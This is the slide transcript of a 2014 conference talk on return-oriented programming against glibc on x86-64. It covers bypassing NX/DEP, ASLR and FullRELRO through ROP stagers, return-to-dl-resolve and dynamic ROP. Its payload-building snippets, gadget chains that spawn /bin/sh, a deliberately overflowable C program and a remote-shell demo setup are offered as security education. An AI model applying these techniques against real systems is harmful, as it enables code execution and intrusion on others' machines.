rop illmatic: exploring universal rop on glibc x86-64 (en)
DESCRIPTION
2014/11/15 AVTOKYO2014 (English Version) Japanese Version: http://www.slideshare.net/inaz2/rop-illmatic-exploring-universal-rop-on-glibc-x8664-jaTRANSCRIPT
ROP ILLMATIC: EXPLORING UNIVERSAL ROP
ON GLIBC X86-64
@inaz2
AVTOKYO2014
2014/11/15
English version
ABOUT ME
• @inaz2
• Security Engineer & Python Programmer
• Japanese Girls Idol Freak
• Weblog “Momoiro Technology” (momoiro = pink color)
• http://inaz2.hatenablog.com/
2
“ILLMATIC” ?
• http://en.wikipedia.org/wiki/Illmatic
• coined word by the American rapper Nas
• "supreme ill. It's as ill as ill gets. That s*** is a science of
everything ill."
3
BACKGROUND
• About arbitrary code execution via buffer overflow vuln. etc.
• Document: “Security mitigations are implemented”
• To what extent can we bypass them?
• Paper: “If there is sufficient executable memory at fixed
address, …”
Rumor: “Difficult because of lack of executable memory at
fixed address on x86-64”
• No universal method effective when executable memory is small?
4
ENVIRONMENT
• Latest Ubuntu Linux on x86-64 architecture
$ uname -aLinux vm-ubuntu64 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
$ lsb_release -aDescription: Ubuntu 14.04.1 LTS
$ gcc --versiongcc (Ubuntu 4.8.2-19ubuntu1) 4.8.2
$ clang --versionUbuntu clang version 3.4-1ubuntu3 (tags/RELEASE_34/final) (based on LLVM 3.4)
5
VULNERABLE CODE
• Minimum C code including stack buffer overflow vuln.
#include <unistd.h>
int main(){
char buf[100];int size;read(0, &size, 8);read(0, buf, size);write(1, buf, size);return 0;
}
Possible to write
more than buffer size here
6
HOW THE CODE IS EXECUTED
• rip register holds the address of insn. to be executed at that time
• Function call on x86-64
• call insn. pushes the address of the next insn. to the stack and
changes rip
• ret insn. pops the address from the stack and restores rip
• Library function call of ELF
• Every object has GOT (Global Offset Table) and PLT (Procedure
Linkage Table) sections
• GOT is the address table of library functions
• PLT is the entry point to jump to each address placed in GOT
• Do the indirect jump through PLT
7
SMASHING THE STACK [PHRACK 49]
• Published in 1996, written by Aleph One
• Overwrite return address of the function and point it to the
shellcode
AAAA
shellcode &buf
buf[100]
saved
ebp
return
address
higher
address
8
SECURITY MITIGATIONS
• Enabled by default
• NX/DEP
• ASLR
• Stack canary
• Additional options
• RELRO + BIND_NOW (FullRELRO)
• FORTIFY_SOURCE
• PIE
9
NX/DEP (DATA EXECUTION PREVENTION)
• Prohibit the execution of rewritable memory (= data)
• Execution of the shellcode in stack/heap region is aborted
$ cat /proc/$$/maps00400000-004ef000 r-xp 00000000 fc:00 265344 /bin/bash006ef000-006f0000 r--p 000ef000 fc:00 265344 /bin/bash006f0000-006f9000 rw-p 000f0000 fc:00 265344 /bin/bash006f9000-006ff000 rw-p 00000000 00:00 001cb0000-01ed1000 rw-p 00000000 00:00 0 [heap]...7fffe374e000-7fffe376f000 rw-p 00000000 00:00 0 [stack]
10
ROP (RETURN-ORIENTED PROGRAMMING)
[BH USA 2008]
• Overwrite return address and point it to executable code
• Return to the code chunk ending with ret insn. (ROP gadget)
repeatedly
• More generally with jmp/call insn., called a code-reuse attack
pop rdi;ret;
&gadget/bin/sh¥x00 &buf
buf[100]
return
address
higher
address
&system
system(“/bin/sh”)
runs
11
X86-64 CALLING CONVENTIONS
• On x86-64, function arguments are passed by registers
• Ordered by rdi, rsi, rdx, rcx, r8, r9
• Need to set value to each register before returning to function
• “pop rdi; ret” / “pop rsi; ret” / “pop rdx; ret” / …
• Often some of these gadgets don’t exist on fixed address
12
LIBC_CSU_INIT GADGETS
• Use code chunks in __libc_csu_init function embedded in
almost all executables
• Arbitrary function call with up to 3 arguments can be performed
• 4th argument (rcx) can be manipulated by memset/memcpy
(1) loc_400626
move values from stack to registers
(2) loc_400610
set arguments and call [r12+rbx*8]
13
ASLR (ADDRESS SPACE LAYOUT RANDOMIZATION)
• Randomize the address of stack/heap and shared libraries
• But the address of executable image is still fixed
heapa.out libc.so.6
1st execution:
higher
address
stack
heapa.out libc.so.6
2nd execution:
stack
14
ROP STAGER USING IO PRIMITIVES
• Send a ROP sequence to a fixed address by using IO functions
in PLT
• read/write, send/recv, fgets/fputs…, something exists in most
cases
• Change the stack pointer to the sent ROP sequence (stack
pivot)
• Swap rsp by setting rbp and executing leave insn.
read@plt # call read(0, 0x601048, 0x400)# 0x601048 = writable address around bss section
pop rbp; ret; # set rbp=0x601048leave; ret; # equiv. to “mov rsp, rbp; pop rbp”
15
DETERMINING LIBRARY FUNCTION ADDRESS
• How to call “system” function at randomized address?
• Read the address of __libc_start_main function on GOT
• Add offset from __libc_start_main to system
• Need to determine the exact libc binary used in the target host
• It can be guessed by the lower bits of the address of
__libc_start_main
$ nm -D -n /lib/x86_64-linux-gnu/libc-2.19.so0000000000021dd0 T __libc_start_main0000000000046530 W system
offset = 0x046530 − 0x021dd0
= 0x24760
16
RETURN-TO-DL-RESOLVE [PHRACK 58]
• Published in 2001, written by Nergal
• Crafting a set of symbol-related structures and make a
dynamic linker (_dl_runtime_resolve function) to load it
• Arbitrary library function call can be performed without
determining libc binary
buf += struct.pack(‘<Q’, addr_plt) # PLT0 jumps to resolverbuf += struct.pack(‘<Q’, offset2rela)buf += ‘NEXT_RIP’buf += ‘A’ * alignment1buf += struct.pack(‘<QQQ’, writable_addr, offset2sym, 0) # Elf64_Relabuf += 'A' * alignment2buf += struct.pack(‘<IIQQ’, offset2symstr, 0x12, 0, 0) # Elf64_Symbuf += ‘system¥x00’ # symstr
17
SKIPPING SYMBOL VERSION CHECK
• Naïve Return-to-dl-resolve fails on x86-64
• SEGV at retrieving the version index of the crafted symbol (*1)
• Read the address of link_map structure in GOT section and
overwrite [link_map+0x1c8] with 0
• Skip the process of retrieving the version info.
if (l->l_info[VERSYMIDX (DT_VERSYM)] != NULL){const ElfW(Half) *vernum =(const void *) D_PTR (l, l_info[VERSYMIDX (DT_VERSYM)]);
ElfW(Half) ndx =vernum[ELFW(R_SYM) (reloc->r_info)] & 0x7fff; // (*1)
version = &l->l_versions[ndx];if (version->hash == 0)version = NULL;
}18
RELRO + BIND_NOW (FULLRELRO)
• Relocation read-only with lazy binding disabled
• Resolve all GOT addresses and make them read-only at the
beginning of execution
• The address of _dl_runtime_resolve function is not set in the
memory at runtime
• Hard to call it directly
(gdb) x/4gx 0x6010000x601000: 0x0000000000000000 0x00000000000000000x601010: 0x0000000000000000 0x0000000000000000
(gdb) x/4gx 0x6010000x601000: 0x0000000000600e28 0x00007ffff7ffe1c80x601010: 0x00007ffff7df04e0 0x0000000000400456
19
FullRELRO (0x601000 = address of GOT section)
DT_DEBUG TRAVERSAL
• Look the value of DT_DEBUG in dynamic section
• There is the address of r_debug structure (for debugging) at
runtime
• From r_debug, we can traverse link_map structure of each
loaded library
• We can get various addresses through link_map structure
• Determine the address of _dl_runtime_resolve function from
GOT section of the loaded library
20
LET’S TRY!
• Launch the shell bypassing ASLR+NX/DEP+FullRELRO on
x86-64
1. Use libc_csu_init gadgets for function call
2. Send a ROP sequence to fixed address by using IO primitives
and perform stack pivot
3. Do DT_DEBUG traversal and determine the address of
_dl_runtime_resolve function
4. Call “system” function by Return-to-dl-resolve
21
DEMO 1
• http://inaz2.hatenablog.com/entry/2014/10/12/191047
• By using gcc, make the executable program with
ASLR+NX/DEP+FullRELRO enabled
• Launch the shell by ROP stager + Return-to-dl-resolve
22
Enable ASLR:
$ sudo sysctl -w kernel.randomize_va_space=2
Compile with NX/DEP+FullRELRO enabled (w/o stack canary):
$ gcc -fno-stack-protector -Wl,-z,relro,-z,now bof.c
Execute the program and exploit it:
$ python exploit.py 100
IT WORKS, BUT IS TOO COMPLICATED…
DT_DEBUG Traversal requires
read & write 5 times
23
DYNAMIC ROP
• Or “Just-in-time Code Reuse” [BH USA 2013]
• Read out the whole libc memory and use it
1. Read the address of __libc_start_main function in GOT
2. Read out about 0x160000 bytes from above address
3. Construct a ROP sequence to execute system call by using ROP
gadgets in read-out memory
pop rax; ret; # set rax=59 (_NR_execve)pop rdi; ret; # set rdi="/bin/sh"pop rsi; ret; # set rsi={"/bin/sh", NULL}pop rdx; ret; # set rdx=NULLsyscall; # call execve("/bin/sh", {"/bin/sh", NULL}, NULL)
24
LEAVE-LESS EXECUTABLES
• Compiling with clang, no leave insn. in function epilogue
• rsp is strictly adjusted by “add rsp, XXh”
• Stack pivot without leave insn. is a pain
• Pivot the sent ROP sequence at fixed address is more difficult
gcc clang
25
RETURN-TO-VULN
• Return to the same vulnerable function repeatedly
• The next ROP sequence can be executed without stack pivot
26
Vulnerable function
Read the address of
__libc_start_main
Read the
libc memoryExecute system call
1. 2.
3.
ROPUTILS
• https://github.com/inaz2/roputils
• A toolkit for various tasks about ROP
• ELF parsing by readelf command
⇒ getting the address of sections, symbols and useful gadgets
• Building ROP sequence from parameters
• Non-blocking IO over pipes (local) and sockets (remote)
• Generating shellcode for Linux i386 / x86-64
• Checking applied security mitigations
• Creating Metasploit pattern and calculating its offset
27
Parse ELF
Getting various addresses
Building a ROP sequence
Import all classes
Non-blocking IOWhen the target is remote,
change here as
Proc(host=x, port=y)
28
DEMO 2
• https://github.com/inaz2/roputils/blob/master/examples/libc-
dynamic-no-leave-x64.py
• By using clang, make the executable program with
ASLR+NX/DEP+FullRELRO enabled
• Create TCP service by socat
• Launch the remote shell by Dynamic ROP + Return-to-vuln
Enable ASLR and compile with NX/DEP+FullRELRO enabled (w/o stack canary):
$ sudo sysctl -w kernel.randomize_va_space=2$ clang -fno-stack-protector -Wl,-z,relro,-z,now bof.c
Execute the program as a TCP service:
$ socat tcp-listen:5000,fork,reuseaddr exec:./a.out &
Exploit it:
$ python libc-dynamic-no-leave-x64.py ./a.out 120 29
HOW ABOUT THE REST?
Stack canary, FORTIFY_SOURCE and PIE
30
STACK CANARY
• Detect stack buffer overflow by inserting a random value
before the return address
• Abort when the value is changed
• If the target is a simple fork server, byte-by-byte bruteforce is
feasible (up to 256 * 8 = 2048 trials)
• Ineffective against pointer overwrite via Heap overflow / Use-
after-free vuln. etc.
31
Check if the value is changed
FORTIFY_SOURCE
• Replace dangerous standard functions with the safer ones
• gets → gets_chk, strcpy → strcpy_chk, read → read_chk, …
• Add buffer size check
• Most of stack buffer overflow vuln. are fixed
• But ROP stager using *_chk is still possible
• Seek pointer overwrite via Heap overflow / Use-after-free vuln.
etc.
32
read(0, buf, size)
→ __read_chk(0, buf, size, 100)
PIE (POSITION-INDEPENDENT EXECUTABLES)
• The address of executable image is also randomized
• Of course only when ASLR enabled
• Ineffective when possible to get the address of something in
the executable or libc (information leak)
• Use other vulns. such as buffer over-read
• Still possible to move the return address by overwriting only
its lower bytes (partial overwrite)
• But generic attack seems difficult
33
FURTHER MITIGATIONS
• Shadow stack
• StackShield (2000), TRUSS (2008), ROPdefender (2011)
• Keep a copy of return address in the separated region and verify
with it
• Related: “SCADS: Separated Control- and Data-Stacks” (2014)
• Coarse-grained Control-Flow Integrity (CFI)
• ROPGuard (2012), kBouncer (2013), ROPecker (2014)
• Indirect Branches and Behavior-Based Heuristics policies
• collect valid destinations and verify with them
• restrict the length of consecutive short sequences (by using threshold)
• Can be bypassed if Call-ret-pair gadget and Long-NOP gadget exist
34
RECAP
• NX/DEP bypass: ROP
• ASLR bypass: ROP stager
• Prerequisite: IO primitives on PLT and sufficient buffer for ROP
• Function call on x86-64: libc_csu_init gadgets
• Library function call: Return-to-dl-resolve
• FullRELRO bypass: DT_DEBUG traversal
• System call execution: Dynamic ROP
• Against leave-less executable: Return-to-vuln
• ROP is illmatic
35
REFERENCES (1/2)
• "Exploit" -記事一覧 - ももいろテクノロジー
• http://inaz2.hatenablog.com/archive/category/Exploit
• Smashing The Stack For Fun And Profit (Phrack 49)
• http://phrack.org/issues/49/14.html
• The advanced return-into-lib(c) exploits: PaX case study (Phrack 58)
• http://phrack.org/issues/58/4.html
• Return-Oriented Programming: Exploits Without Code Injection (Black
Hat USA 2008)
• http://cseweb.ucsd.edu/~hovav/talks/blackhat08.html
• Return to Dynamic Linker (Codegate 2014 Junior)
• http://blog.jinmo123.pe.kr/entry/Codegate-2014-Junior-Presentation
36
REFERENCES (2/2)
• Ghost in the Shellcode 2014 - fuzzy - Code Arcana
• http://codearcana.com/posts/2014/01/19/ghost-in-the-shellcode-2014-fuzzy.html
• Just-In-Time Code Reuse: The more things change, the more they stay
the same (Black Hat USA 2013)
• https://media.blackhat.com/us-13/US-13-Snow-Just-In-Time-Code-Reuse-
Slides.pdf
• SCADS: Separated Control- and Data-Stacks (SECURECOMM 2014)
• https://www1.cs.fau.de/filepool/scads/scads-securecomm2014.pdf
• Stitching the Gadgets: On the Ineffectiveness of Coarse-Grained Control-
Flow Integrity Protection (USENIX Security 2014)
• https://www.usenix.org/conference/usenixsecurity14/technical-
sessions/presentation/davi
• And many others
37
THANK YOU!
@inaz2
38